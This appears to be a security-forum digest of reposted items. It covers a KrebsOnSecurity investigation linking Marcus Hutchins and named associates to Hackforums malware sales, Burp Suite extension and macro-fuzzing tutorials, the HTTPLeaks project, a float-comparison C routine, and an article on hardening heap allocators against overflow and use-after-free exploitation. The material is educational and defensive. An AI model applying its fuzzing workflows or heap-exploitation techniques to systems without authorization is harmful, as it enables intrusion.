According to one thread on Hackforums, Element Products was sold in 2012 to another Hackforums user named “Dal33t.” This was the nickname used by Ammar Zuberi, a young man from Dubai who — according to this January 2017 KrebsOnSecurity story — may have been associated with a group of miscreants on Hackforums that specialized in using botnets to take high-profile Web sites offline. Zuberi could not be immediately reached for comment. I soon discovered that Element Products was by far the least harmful product that this user sold on Hackforums. In a separate thread in 2012, Element Products announces the availability of a new product he had for sale — dubbed the “Ares Form Grabber” — a program that could be used to surreptitiously steal usernames and passwords from victims. Element Products/Gone With The Wind also advertised himself on Hackforums as an authorized reseller of the infamous exploit kit known as “Blackhole.” Exploit kits are programs made to be stitched into hacked and malicious Web sites so that when visitors browse to the site with outdated and insecure browser plugins, the browser is automatically infected with whatever malware the attacker wishes to foist on the victim. In addition, Element Products ran a “bot shop,” in which he sold access to bots he claimed to have enslaved through his own personal use of Blackhole: Gone With The Wind’s “Bot Shop,” which sold access to computers hacked with the help of the Blackhole exploit kit. A bit more digging showed that the Element Products user on Hackforums co-sold his wares along with another Hackforums user named “Kill4Joy,” who advertised his contact address as kill4joy@live.com. Ironically, Hackforums was itself hacked in 2012, and a leaked copy of the user database from that hack shows this Kill4Joy user initially registered on the forum in 2011 with the email address rohang93@live.com. 
A reverse WHOIS search at domaintools.com shows that email address was used to register several domain names, including contegoprint.info. The registration records for that domain show that it was registered by a Rohan Gupta from Illinois. I learned that Gupta is now attending graduate school at the University of Illinois at Urbana-Champaign, where he is studying computer engineering. Reached via telephone, Gupta confirmed that he worked with the Hackforums user Element Products six years ago, but said he only handled sales for the Element Scanner product, which he says was completely legal. “I was associated with Element Scanner which was non-malicious,” Gupta said. “It wasn’t black hat, and I wasn’t associated with the programming, I just assisted with the sales.” Gupta said his partner and developer of the software went by the name Michael Chanata and communicated with him via a Skype account registered to the email address atthackers@hotmail.com. Recall that we heard at the beginning of this story that the name Michael Chanata was tied to Heckforums.net, a domain closely connected to the Iarkey nickname on Hackforums. Curious to see if this Michael Chanata character showed up somewhere on Hackforums, I used the forum’s search function to find out. The following screenshot from a July 2011 Hackforums thread suggests that Michael Chanata was yet another nickname used by Da Loser, a Hackforums account associated with Marcus Hutchins’ early email addresses and Web sites. Hackforums shows that the user “Da Loser” at the same time used the nickname “Michael Chanata.” BV1/ORGY Interesting connections, to be sure, but I wasn’t satisfied with this finding and wanted more conclusive evidence of the supposed link. So I turned to “passive DNS” tools from Farsight Security — which keeps a historic record of which domain names map to which IP addresses. 
Using Farsight’s tools, I found that Element Scanner’s various Web sites (elementscanner[dot]com/net/su/ru) were at one point hosted at the Internet address 184.168.88.189 alongside just a handful of other interesting domains, including bigkeshhosting[dot]com and bvnetworks[dot]com. At first, I didn’t fully recognize the nicknames buried in each of these domains, but a few minutes of searching on Hackforums reminded me that bigkeshhosting[dot]com was a project run by a Hackforums user named “Orgy.” I originally wrote about Orgy — whose real name is Robert George Danielson — in a 2012 story about a pair of stresser or “booter” (DDoS-for-hire) sites. As noted in that piece, Danielson has had several brushes with the law, including a guilty plea for stealing multiple firearms from the home of a local police chief. I also learned that the bvnetworks[dot]com domain belonged to Orgy’s good friend and associate on Hackforums — a user who for many years went by the nickname “BV1.” In real life, BV1 is 27-year-old Brendan Johnston, a California man who went to prison in 2014 for his role in selling the Blackshades trojan. When I discovered the connection to BV1, I searched my inbox for anything related to this nickname. Lo and behold, I found an anonymous tip I’d received through KrebsOnSecurity.com’s contact form in March 2013 which informed me of BV1’s real identity and said he was close friends with Orgy and the Hackforums user Iarkey. According to this anonymous informant, Iarkey was an administrator of an Internet relay chat (IRC) forum that BV1 and Orgy frequented called irc.voidptr.cz. “You already know that Orgy is running a new booter, but BV1 claims to have ‘left’ the hacking business because all the information on his family/himself has been leaked on the internet, but that is a lie,” the anonymous tipster wrote. “If you connect to http://irc.voidptr.cz ran by ‘touchme’ aka ‘iarkey’ from hackforums you can usually find both BV1 and Orgy in there.” TOUCHME/TOUCH MY MALWARE/MAYBE TOUCHME Until recently, I was unfamiliar with the nickname TouchMe. Naturally, I started digging into Hackforums again. An exhaustive search on the forum shows that TouchMe — and later “Touch Me Maybe” and “Touch My Malware” — were yet other nicknames for the same account. In a Hackforums post from July 2012, the user Touch Me Maybe pointed to a writeup that he claimed to have authored on his own Web site: touchmymalware.blogspot.com: The Hackforums user “Touch Me Maybe” seems to refer to his own blog and malware analysis at touchmymalware.blogspot.com, which now redirects to Marcus Hutchins’ blog — Malwaretech.com If you visit this domain name now, it redirects to Malwaretech.com, which is the same blog that Hutchins was updating for years until his arrest in August. There are other facts to support a connection between MalwareTech and the IRC forum voidptr.cz: A passive DNS scan for irc.voidptr.cz at Farsight Security shows that at one time the IRC channel was hosted at the Internet address 52.86.95.180 — where it shared space with just one other domain: irc.malwaretech.com. All of the connections explained in this blog post — and some that weren’t — can be seen in the following mind map that I created with the excellent MindNode Pro for Mac. A mind map I created to keep track of the myriad data points mentioned in this story. Following Hutchins’ arrest, multiple Hackforums members posted what they suspected about his various presences on the forum. In one post from October 2011, Hackforums founder and administrator Jesse “Omniscient” LaBrocca said Iarkey had hundreds of accounts on Hackforums. In one of the longest threads on Hackforums about Hutchins’ arrest there are several postings from a user named “Previously Known As” who self-identifies in that post and multiple related threads as BV1. 
In one such post, dated Aug. 7, 2017, BV1 observes that Hutchins failed to successfully separate his online selves from his real life identity. Brendan “BV1” Johnston says he worried his old friend’s operational security mistakes would one day catch up with him. “He definitely thought he separated TouchMe/MWT from iarkey/Element,” said BV1. “People warned him, myself included, that people can still connect MWT to iarkey, but he never seemed to care too much. He has so many accounts on HF at this point, I doubt someone will be able to connect all the dots. It sucks that some of the worst accounts have been traced back to him already. He ran a hosting company and a Minecraft server with Orgy and I.” In a brief interview with KrebsOnSecurity, Brendan “BV1” Johnston said Hutchins was a good friend. Johnston said Hutchins had — like many others who later segued into jobs in the information security industry — initially dabbled in the dark side. But Johnston said his old friend sincerely tried to turn things around in late 2012 — when Gone With the Wind sold most of his coding projects to other Hackforums members and began focusing on blogging about poorly-written malware. “I feel like I know Marcus better than most people do online, and when I heard about the accusations I was completely shocked,” Johnston said. “He tried for such a long time to steer me down a straight and narrow path that seeing this tied to him didn’t make sense to me at all.” Let me be clear: I have no information to support the claim that Hutchins authored or sold the Kronos banking trojan. According to the government, Hutchins did so in 2014 on the Dark Web marketplace AlphaBay — which was taken down in July 2017 as part of a coordinated, global law enforcement raid on AlphaBay sellers and buyers alike. 
However, the findings in this report suggest that for several years Hutchins enjoyed a fairly successful stint coding malicious software for others, said Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley. “It appears like Mr. Hutchins had a significant and prosperous blackhat career that he at least mostly gave up in 2013,” Weaver said. “Which might have been forgotten if it wasn’t for the involuntary British press coverage on WannaCry raising his profile and making him out as a ‘hero’.” Weaver continued: “I can easily imagine the Feds taking the opportunity to use a penny-ante charge against a known ‘bad guy’ when they can’t charge for more significant crimes,” he said. “But the Feds would have done far less collateral damage if they actually provided a criminal complaint with these sorts of detail rather than a perfunctory indictment.” Hutchins did not try to hide the fact that he has written and published unique malware strains, which in the United States at least is a form of protected speech. In December 2014, for example, Hutchins posted to his Github page the source code to TinyXPB, malware he claims to have written that is designed to seize control of a computer so that the malware loads before the operating system can even boot up. While the publicly available documents related to his case are light on details, it seems clear that prosecutors can make a case against those who attempt to sell malware to cybercriminals — such as on hacker forums like AlphaBay — if they can demonstrate the accused had knowledge and intent that the malware would be used to commit a crime. The Justice Department’s indictment against Hutchins suggests that the prosecution is relying heavily on the word of an unnamed co-conspirator who became a confidential informant for the government. Update, 9:08 a.m.: Several readers on Twitter disagreed with the previous statement, noting that U.S. 
prosecutors have said the other unnamed suspect in the Hutchins indictment is still at large. Original story: According to a story at BankInfoSecurity, the evidence submitted by prosecutors for the government includes:
- Statements made by Hutchins after he was arrested.
- A CD containing two audio recordings from a county jail in Nevada where he was detained by the FBI.
- 150 pages of Jabber chats between the defendant and an individual.
- Business records from Apple, Google and Yahoo.
- Statements (350 pages) by the defendant from another internet forum, which were seized by the government in another district.
- Three to four samples of malware.
- A search warrant executed on a third party, which may contain some privileged information.
Hutchins declined to comment for this story, citing his ongoing prosecution. He has pleaded not guilty to all four counts against him, including conspiracy to distribute malicious software with the intent to cause damage to 10 or more affected computers without authorization, and conspiracy to distribute malware designed to intercept protected electronic communications. FBI officials have not yet responded to requests for comment. Sursa: https://krebsonsecurity.com/2017/09/who-is-marcus-hutchins/
  8. Super POC: http://m.blog.csdn.net/caiqiiqi/article/details/77861477
  9. A lot of work has gone into the customer service & support side lately.
  10. If you connect with a German IP, there is probably no limit.
  11. HUNT Burp Suite Extension

HUNT is a Burp Suite extension to:
- Identify common parameters vulnerable to certain vulnerability classes.
- Organize testing methodologies inside of Burp Suite.

HUNT Scanner (hunt_scanner.py)
This extension does not test these parameters but rather alerts on them so that a bug hunter can test them manually (thoroughly). For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description to do thorough manual testing of these vulnerability classes.

HUNT Methodology (hunt_methodology.py)
This extension allows testers to send requests and responses to a Burp tab called "HUNT Methodology". This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending request/responses here, testers can organize or attest to having done manual testing in that section of the application, or to having completed a certain methodology step.

Getting Started with HUNT
- First ensure you have the latest standalone Jython JAR set up under "Extender" -> "Options".
- Add HUNT via "Extender" -> "Extensions".
- HUNT Scanner will begin to run across traffic that flows through the proxy.

Important to note: HUNT Scanner leverages the passive scanning API. Passive scan checks are run under the following conditions:
- The first request of an active scan
- Proxy requests
- Any time "Do a passive scan" is selected from the context menu

Passive scans are not run on the following:
- Active scan responses
- Repeater responses
- Intruder responses
- Sequencer responses
- Spider responses

Instead, the standard workflow would be to set your scope, run Burp Spider from the Target tab, then right-click "Passively scan selected items". 
HUNT Scanner Vulnerability Classes
- SQL Injection
- Local/Remote File Inclusion & Path Traversal
- Server Side Request Forgery & Open Redirect
- OS Command Injection
- Insecure Direct Object Reference
- Server Side Template Injection
- Logic & Debug Parameters
- Cross Site Scripting
- External Entity Injection
- Malicious File Upload

TODO
- Change regex for parameter names to include user_id instead of just id
- Search in scanner window
- Highlight param in scanner window
- Implement script name checking, REST URL support, JSON & XML post-body params
- Support normal convention of Request tab: Raw, Params, Headers, Hex sub-tabs inside scanner
- Add more methodology JSON files: Web Application Hacker's Handbook, PCI, HIPAA, CREST, OWASP Top Ten, OWASP Application Security Verification Standard, Penetration Testing Execution Standard, Burp Suite Methodology
- Add more text for advisory in scanner window
- Add more descriptions and resources in methodology window
- Add functionality to send request/response to other Burp tabs like Repeater

Authors: JP Villanueva, Jason Haddix, Ryan Black, Fatih Egbatan, Vishal Shah
License: Licensed with the Apache 2.0 License
Sursa: https://github.com/bugcrowd/HUNT
  12. Dave Watson, Facebook, San Francisco, USA (davejwatson@fb.com). Abstract: Transport Layer Security (TLS) is a widely-deployed protocol used for securing TCP connections on the Internet. TLS is also a required feature for HTTP/2, the latest web standard. In-kernel implementations provide new opportunities for optimization of TLS. This paper explores a possible kernel TLS implementation, as well as the kernel features it enables, such as sendfile(), BPF programs, and hardware TLS offload. Our implementation saves up to 7% of CPU copy overhead and provides up to 10% latency improvements when combined with the Kernel Connection Multiplexor (KCM). Download: https://netdevconf.org/1.2/papers/ktls.pdf
  13. Comparing Floating Point Numbers in C/C++. Published September 2nd, 2017 by Elliot Chance.

Comparing floating point numbers for equality can be problematic. It's difficult because often we are comparing small or large numbers that are not represented exactly. There are also issues with rounding errors caused by not being able to represent an exact value. Rather than doing a strict value comparison (==), we treat two values as equal if their values are very close to each other. So what does "very close" mean? Well, to answer that we have to take a look at how the numbers are represented in memory. Here is an example 32-bit float: And here is the layout of a double-precision (64-bit) float: The number of bits in the fraction can be thought of as the number of significant bits (or accuracy) of the number. We do not want to use all of the fraction bits, otherwise we would be doing a strict comparison, but we will use most. For both sized float types I will use 4 fewer significant bits:

#define INT64 (52 - 4)
#define INT32 (23 - 4)

We will use this to calculate the epsilon (the small difference that is still considered equal). However, we have to be careful that the number of bits we use to calculate the epsilon is based on the smallest-precision value in the comparison. For example, if we compare a 32-bit float with a 64-bit float, we must use only the precision of the 32-bit float. For this we can use a macro:

#define approx(actual, expected) approxf(actual, expected, \
    sizeof(actual) != sizeof(expected) ? INT32 : INT64)

There are two more gotchas:
- Zero is a special case because the epsilon would also be zero, causing an exact comparison. So we need to treat this as a separate case.
- Non-finite values, such as NaNs and infinities, are never equal to each other in any combination. If either side is non-finite, the comparison is never equal.

static int approxf(double actual, double expected, int bits) {
    // We do not handle infinities or NaN.
    if (isinf(actual) || isinf(expected) || isnan(actual) || isnan(expected)) {
        return 0;
    }

    // If we expect zero (a common case) we have a fixed epsilon from actual. If
    // allowed to continue, the epsilon calculated would be zero and we would be
    // doing an exact match, which is what we want to avoid.
    if (expected == 0.0) {
        return fabs(actual) < (1 / pow(2, bits));
    }

    // The epsilon is calculated based on the significant bits of the expected
    // value. The number of bits used depends on the original size of the float
    // (in terms of bits), minus a few to allow for very slight rounding errors.
    double epsilon = fabs(expected / pow(2, bits));

    // The numbers are considered equal if the absolute difference between them
    // is less than the relative epsilon.
    return fabs(actual - expected) <= epsilon;
}

You can find the full commented solution as part of the test suite in the c2go project. Thank you for reading. I'd really appreciate any and all feedback; please leave your comments below or consider subscribing. Happy coding. Sursa: https://elliot.land/post/comparing-floating-point-numbers-in-c-c
  14. Black Hat. Published on Aug 31, 2017. A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset. Full abstract: https://www.blackhat.com/us-17/briefi... Download PDF: https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf
  15. HTTPLeaks
HTTPLeaks. What is this? This project aims to enumerate all possible ways a website can leak HTTP requests. In one single HTML file. See the file leak.html (raw text version) in the root of this repository. What is it for? You can use this to test your browser for CSP leaks, your web-mailer for HTTP leaks, and everything else that is not supposed to send HTTP requests to where the sun won't shine. With "HTTP leak", we are essentially referring to a situation where a certain combination of HTML elements and attributes causes a request to an external resource to be fired - when it should not. Think, for example, of the body of an HTML mail, where an HTTP leak would tell someone out there that you just read that mail. Not always bad - but almost never good. Or think about web proxies. Those tools try to show you a website from a different domain to offer what they call "anonymity". Of course, they also have to rewrite all HTML elements and attributes that fetch resources via HTTP (or alike), and if they forget something, the so-called "anonymity" is gone. And, since no one really knows anymore what elements and attributes can request external resources, we decided to create this project to keep track of that. And now? The HTML will be extended as soon as we learn about a new leak; pull requests with additional exotic sources of HTTP leaks are very welcome! Also welcome are ideas for how else this content could be presented (JSON, HTML, XML, ...). Acknowledgements: Thanks @hasegawayosuke, @masa141421356, @mramydnei, @avlidienbrunn, @orenhafif, @freddyb, @tehjh, @webtonull, @intchloe, @Boldewyn and many others for adding content and smaller fixes here and there! Sursa: https://github.com/cure53/HTTPLeaks
  16. Automating Web App Input Fuzzing via Burp Macros. Posted on September 3, 2017 by Samrat Das.

Hi readers, this article is about Burp Suite macros, which help automate the effort of manual input payload fuzzing. While they may already be known to many testers, this article is written for those who are yet to harness the power of Burp Suite's macro automation. In my penetration testing career so far, while fuzzing parameters and page fields in web applications, I encountered some challenges relating to session handling. In multiple cases, the application would terminate the session being used for testing. This happened either because of security countermeasures (for example, on receiving unsafe input the session would get logged out) or because, say, the Burp spider/crawler fuzzed the logout page parameters and terminated the session. In such cases, further scans, probes and requests become unproductive, since you have to log in again and re-establish the application session. I used to do this manually, and it was a bit cumbersome. While trying to find a workaround, I was going through Burp Suite's functions and, out of curiosity, noticed Burp's session handling functionality. After probing around the options, backed by some online research, I came to the conclusion that Burp takes care of the above challenges with some rule-based macros. In simple words: if fuzzing parameters leads to termination of the session, Burp can log back in to the app with the credentials and continue scanning and crawling by itself.

Things needed:
1. Burp's free version (1.7.21 free)
2. Any website which has session handling (I am demonstrating with the classic demo.testfire.net)

Step 1: This is the website I am using, which has a login feature: Vulnerable Website
Step 2: At this point, I simply keep interception off in Burp Suite and enter the credentials to perform a login. 
Login Page
Step 3: Here we reach the logged-in page of the website: Login field values
Step 4: Now, in order to test session handling, we can send this page request to Burp's Repeater tab and, by removing the cookies, check whether the session is terminated. Request using repeater
Step 5: We can see that the page session is working, since we have a proper session. Let's try to remove the cookies and test again. Repeater Tab
Step 6: As we can see, the session gets logged out and we need to log back in to continue testing. Session Terminated
Step 7: Now Burp macros come to the rescue. Navigate to: Project Options -> Sessions -> Session Handling Rules. Setting up Macro
Step 8: Here we can see that there is a default rule – Use cookies from Burp's cookie jar. Burp Cookie Jar
Step 9: Click the Add button to create a new rule. Adding rule for macro
Step 10: Put in a rule description which suits you and, under rule actions, select "Check session is valid". Setting burp rule description
Step 11: Once you click OK, the session handling editor will fire up, showing the default: Issue current request. Leave it as is and scroll down to "If session is invalid, perform the following action". Rule Configuration. Rule Configuration Setting
Step 12: Tick "If session is invalid" and click Add macro. At this point, you will get a Macro Recorder which has all the proxy history. Click and select the page which has the login credentials and performs a login. Click OK.
Step 13: Once you click OK, the macro editor will fire up and you can give the macro a custom name, as well as use the options to simulate, re-record, or re-analyze it. Macro Recorder
Step 14: Before running a test, configure the parameters and verify that Burp has captured the test parameters correctly. Macro Recorder Parameter Check
Step 15: Since everything is set here, we can do a test run of the macro after clicking OK. 
Step 16: Now click on the final scope and set the URL scope to all URLs / suite scope / custom scope to tell the macro where to run.
Step 17: I leave it as include all URLs here. Let's now head over to Repeater again to test our macro. Scope setting for macro
Step 18: Take a look: we are trying to access the main page without cookies in the Repeater tab.
Step 19: Once we hit Go, the cookies will automatically get added to the request and the page will load up! Tampering cookie value to check session. Macro executed. Macro executed with cookie added.
So that's it. It's a sweet and simple way to show how Burp is useful for creating session-based rules and macros. We can simply fuzz the input fields with our test payloads to check for vulnerabilities such as XSS, SQLi, IDOR, etc. Even if the application gets timed out due to intermediate inactivity, or protects sessions against junk inputs during automated scanning or manual testing, such macros will help you execute the recorded action and log you back in to the app! You can explore further and use the cookie jar, Burp Extender and lots of other options! Happy experimenting! Sursa: http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/
  17. Thursday, December 22, 2016. Hardening Allocators with ADI. Memory allocators handle a crucial role in any modern application/operating system: satisfying arbitrary-sized dynamic memory requests. Errors by the consumer in handling such buffers can lead to a variety of vulnerabilities, which have been regularly exploited by attackers in the past 15 years. In this blog entry, we'll look at how the ADI (Application Data Integrity) feature of the new Oracle M7 SPARC processors can help in hardening allocators against most of these attacks. A quick memory allocator primer. Writing memory allocators is a challenging task. An allocator must be performant, limit fragmentation to a bare minimum, scale up to multi-threaded applications and efficiently handle both small and large allocations and frequent/infrequent alloc/free cycles. Looking in depth at allocator designs is beyond the scope of this blog entry, so we'll focus here only on the features that are relevant from an exploitation (and defense) perspective. Modern operating systems deal with memory in page-sized chunks (ranging from 8K up to 16G on M7). Imagine an application that needs to store a 10-character string: handing out an 8K page is certainly doable, but is hardly an efficient way to satisfy the request. Memory allocators solve the problem by sitting between the OS physical page allocator and the consumer (be it the kernel itself or an application) and efficiently managing arbitrary-sized allocations, dividing pages into smaller chunks when small buffers are needed. Allocators are composed of three main entities: live buffers: a chunk of memory that has been assigned to the application and is guaranteed to hold at least the amount of bytes requested. free buffers: chunks of memory that the allocator can use to satisfy an application request. Depending on the allocator design, these are either fixed-size buffers or buffers that can be sliced into smaller portions. 
metadata: all the necessary information that the allocator must maintain in order to work efficiently. Again, depending on the allocator design, this information might be stored within the buffer itself (e.g. Oracle Solaris libc malloc stores most of the data along with the buffer) or separately (e.g. the Oracle Solaris umem/kmem SLAB allocator keeps the majority of the metadata in dedicated structures placed outside the objects). Since allocators divide a page into either fixed-size or arbitrary-size buffers, it's easy to see that, due to the natural flow of alloc/free requests, live buffers and free buffers end up living side by side in the linear memory space. The period from when a buffer is handed out to an application up until it is freed is generally referred to as the buffer lifetime. During this period, the application has full control of the buffer contents. After this period, the allocator regains control and the application is expected to not interfere. Of course, bugs happen. Bugs can affect both the application's working set of buffers and the allocator's free set and metadata. If we exclude allocator intrinsic design errors (which, for long-existing allocators, due to the amount of exercise they get, are basically zero), bugs always originate from the application's mishandling of a buffer reference, so they always happen during the lifetime of a buffer and originate from a live buffer. It's no surprise that live buffer behavior is what both attackers and defenders start from. Exploitation vectors and techniques. As we said, bugs originate from the application's mishandling of allocated buffers: mishandling of buffer size: the classic case of buffer overflow. The application writes past the buffer boundaries into adjacent memory. Because buffers are intermixed with other live buffers, free buffers and, potentially, metadata, each one of those entities becomes a potential target, and attackers will go for the most reliable one. 
mishandling of buffer references: a buffer is relinquished back to the allocator, but the attacker still holds a reference to it. Traditionally, these attacks are known as use after free (UAF), although, since this is an industry that loves taxonomies, it's not uncommon to see them further qualified as use after realloc (the buffer is reallocated, but the attacker is capable of unexpectedly modifying it through the stale reference) and double free (the same reference is passed twice to the free path). Sometimes an attacker is also capable of constructing a fake object and passing it to a free call, for example if the application erroneously calls free on a buffer allocated on the stack. The degree of exploitability of these vulnerabilities (if we exclude the use after realloc case, which is application-specific) varies depending on what the allocator does during the free path and how many consistency/hardening checks are present. With the notable exception of double free and "vanilla" use after free, both of the above classes are extremely hard to detect at runtime from an allocator perspective, as they originate (and potentially inflict all the necessary damage) during the object lifetime, and the allocator has little to no practical control over the buffer. For this reason, the defense focus has been on the next best thing when bug classes cannot be eradicated: hampering/mitigating exploitation techniques. Over the years (and to various degrees in different allocators) this has taken the form of: entrypoint checks: adding consistency checks at the defined free and alloc entrypoints. As an example, an allocator could mark in the buffer's associated metadata (or poison the buffer itself) that the buffer has been freed. It would then be able to check this information whenever the free path is entered, and a double free could be easily detected. 
Many of the early-day techniques to exploit heap overflows (~2000, w00w00, PHRACK57 MaXX's and anonymous' articles) relied on modifying metadata that would then be leveraged during the free path. Over time, some allocators have added checks to detect some of those techniques.

design mitigations: attackers crave control of the heap layout: in what sequence buffers are allocated, where they are placed, how a buffer containing sensitive data can be conveniently allocated in a specific location. Allocators can introduce statistical mitigations to hamper some of the techniques used to achieve this level of control. As an example, free object selection can be randomized (although this ends up being pretty ineffective against a variety of heap spraying techniques and/or if the attacker has substantial control over the allocation pattern), free patterns can be modified (Microsoft IE Memory Protector), or sensitive objects can be allocated from a different heap space (dedicated SLAB caches, Windows IE Isolated Heap, Chrome PartitionAlloc, etc.).

The bottom-line goal of these (and other) design approaches is to either reduce the predictability of the allocator or increase the amount of precise control the attacker needs in order to create the heap layout conditions required to exploit the bug. Of course, more invasive defenses also exist, but they hardly qualify for large-scale deployment, as users tend to (rightfully) be pretty concerned about the performance of their applications/operating systems. This becomes even more evident when we compare the amount of defenses enabled and deployed today at kernel level versus the amount enabled at user level (and in browsers): different components have different (and varying) performance requirements.
The practical result is that slab overflows are today probably the most reliable type of vulnerability at kernel level, with use after free a close second in kernel land, while the latter is extensively targeted in user land, where only the browsers are significantly more hardened than other components. Extensive work is going on towards automating and abstracting the development of exploits for such bugs (as recently presented by argp at Zeronights), which makes the design of efficient defenses even more compelling.

ADI to the rescue

Enter the Oracle SPARC M7 processor and ADI, Application Data Integrity, both unveiled at Hot Chips and Oracle OpenWorld 2014. At its core, ADI provides memory tagging. Whenever ADI is enabled on a page entry, dedicated non-privileged load/store instructions provide the ability to assign a 4-bit version to each 64-byte cache line that is part of the page. This version is maintained by the hardware throughout the entire non-persistent memory hierarchy (basically, all the way down to DRAM and back). The same version can then be mirrored onto the (previously) unused 4 topmost bits of each virtual address. Once this is done, each time a pointer is used to access a memory range, if ADI is enabled (both at the page and per-thread level), the tag stored in the pointer is checked by the hardware against the tag stored in the cache line. If the two match, all is peachy. If they don't, an exception is raised.

Since the check is done in hardware, the main burden is at buffer creation, rather than at each access, which means that ADI can be introduced in a memory allocator and its benefit extended to any application consuming it without the need for extra instrumentation or special instructions in the application itself. This is a significant difference from other hardware-based memory corruption detection options, like Intel MPX, and minimizes the performance impact of ADI while maximizing coverage.
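The pointer-side half of the scheme (mirroring the 4-bit version onto the topmost bits of a 64-bit virtual address) is just bit arithmetic, and can be sketched as below. This is illustrative only: the cache-line side of real ADI tagging is done with dedicated SPARC store instructions, not C code, and the shift value simply assumes a 64-bit VA with the 4 topmost bits free, as the article describes.

```c
#include <assert.h>
#include <stdint.h>

/* 4 topmost bits of a 64-bit virtual address hold the version. */
#define ADI_TAG_SHIFT 60
#define ADI_TAG_MASK  ((uint64_t)0xF << ADI_TAG_SHIFT)

/* Mirror a 4-bit version into the top bits of a pointer value. */
static uint64_t adi_set_tag(uint64_t va, unsigned tag)
{
    return (va & ~ADI_TAG_MASK) | ((uint64_t)(tag & 0xF) << ADI_TAG_SHIFT);
}

/* Recover the version carried by a tagged pointer value. */
static unsigned adi_get_tag(uint64_t va)
{
    return (unsigned)((va & ADI_TAG_MASK) >> ADI_TAG_SHIFT);
}
```

On access, the hardware compares the pointer's version against the cache line's version and raises an exception on mismatch; the allocator only pays the tagging cost at buffer creation.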
More importantly, this means we finally have a reliable way to detect live object mishandling: the hardware does it for us.

[ADI versioning at work. Picture taken from Oracle SPARC M7 presentation]

4 bits allow for a handful of possible values. There are two intuitive ways in which an ADI-aware allocator can invariantly detect a linear overflow from a buffer/object into the adjacent one:

introduce a redzone with a special tag
tag any two adjacent buffers differently

Introducing a redzone means wasting 64 bytes per allocation, since 64 bytes is the minimum granularity with ADI. Wasted memory scales up linearly with the number of allocations and might end up being a substantial amount. Also, the redzone entry must be 64-byte aligned as well, which practically translates into both the buffers and the redzone being 64-byte aligned. The advantage of this approach is that it is fairly simple to implement: simply round up every allocation to 64 bytes and add an extra complementary 64-byte buffer. For this reason, it can be a good candidate for debugging scenarios or for applications that are not particularly performance sensitive and need a simple allocation strategy. For allocators that store metadata within the buffer itself, this redzone space could be used to store the metadata information. Mileage again varies depending on how big the metadata is, and it's worth pointing out that general-purpose allocators usually strive to keep it small (e.g. Oracle Solaris libc uses 16 bytes for each allocated buffer) to reduce memory wastage.

Tagging two adjacent objects differently, instead, has the advantage of reducing memory wastage. In fact, the only induced wastage is the one from forcing the alignment to a 64-byte boundary. It also requires, though, being able to uniquely pick a correct tag value at allocation time.
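The redzone sizing rule described above (round every request up to the 64-byte ADI granularity, then append one 64-byte redzone line) can be sketched as a helper; the function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define ADI_LINE 64  /* minimum ADI tagging granularity */

/* Total bytes to reserve for a request under the redzone scheme:
 * payload rounded up to 64 bytes, plus one 64-byte redzone line
 * that would receive its own reserved tag. */
static size_t redzone_alloc_size(size_t request)
{
    size_t rounded = (request + ADI_LINE - 1) & ~(size_t)(ADI_LINE - 1);
    return rounded + ADI_LINE;
}
```

Even a 1-byte request costs 128 bytes under this scheme, which is exactly the linear wastage the article warns about.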
Object-based allocators are a particularly good fit for this design because they already take some of the penalty for wasted memory (and larger caches are usually already 64-byte aligned), and their design (fixed-size caches divided into a constant number of fixed-size objects) allows objects to be uniquely identified based on their address. This provides the ability to alternate between two different values (or ranges of values, e.g. odd/even tags, smaller/bigger than a median) based on the object position. For other allocators, the ability to properly tag the buffer depends on whether there is enough metadata to learn the previous and next object's tag. If there is, then this can still be implemented; if there isn't, one might decide to employ a statistical defense by randomizing the tag (note that the same point applies also to object-based allocators when we look at large caches, where effectively only a single object is present per cache).

A third interesting property of tagging is that it can be used to uniquely identify classes of objects, for example free objects. As we discussed previously, metadata and free objects are never the affector, but only the affectee of an attack, so one tag each suffices. The good side effect of devoting a tag to each is that the allocator now has a fairly performant way to identify them, and issues like double frees can be easily detected. In the same way, it's also automatically guaranteed that a live object will never be able to overflow into metadata or free objects, even if a statistical defense (e.g. tag randomization) is employed.

Use-after-realloc and arbitrary writes

ADI does one thing and does it great: it provides support to implement an invariant to detect linear overflows.
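For a fixed-size object cache, picking alternating tags from the object position alone can be sketched as follows. The tag values 0x1/0x2 are arbitrary assumptions, not anything mandated by ADI; the point is only that adjacent objects are guaranteed to differ.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* In a slab of fixed-size objects, the object's index (and hence its
 * parity) can be derived from its address alone, so adjacent objects
 * always receive different tags. */
static unsigned slab_tag_for(uintptr_t slab_base, uintptr_t obj, size_t objsize)
{
    size_t index = (obj - slab_base) / objsize;
    return (index & 1) ? 0x2 : 0x1;
}
```

Because the choice is a pure function of the address, no extra per-object metadata is needed to satisfy the "adjacent tags differ" invariant.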
Surely, this doesn't come without some constraints (64-byte granularity, 64-byte alignment, page-level granularity to enable it, 4-bit versioning range) and might be a more or less good fit (performance- and design-wise) for an existing allocator, but this doesn't detract from its security potential. Heartbleed is just one example of a linear out-of-bounds access, and SLAB/heap overflow fixes have been in the commit logs of all major operating systems for years now. Invariantly detecting them is a significant win.

Use-after-realloc and arbitrary writes, instead, can't be invariantly stopped by ADI, although ADI can help in mitigating them. As we discussed, use-after-realloc relies on the attacker's ability to hold a reference to a freed-and-then-realloced object and then use this reference to modify some potentially sensitive content. ADI can introduce some statistical noise in this exploitation path, by looping/randomizing through different values for the same buffer/object. Note that this doesn't affect the invariant portion of, for example, alternate tagging in object-based allocators; it simply takes further advantage of the versioning space. Of course, if the attacker is in the position to perform a bruteforce attack, this mitigation would not hold much ground, but in certain scenarios bruteforcing might be a limiting factor (kernel level exploitation) or leave some detectable noise.

Arbitrary writes, instead, depend on the ability of the attacker to forge an address and are not strictly related to allocator ranges only. Since the focus here is the allocator, the most interesting variant is when the attacker has the ability to write at an arbitrary offset from the current buffer. If metadata and free objects are specially tagged, they are unreachable, but other live objects with the same tag might be reached. Just as in the use-after-realloc case, adding some randomization to the sequence of tags can help, with the very same limitations.
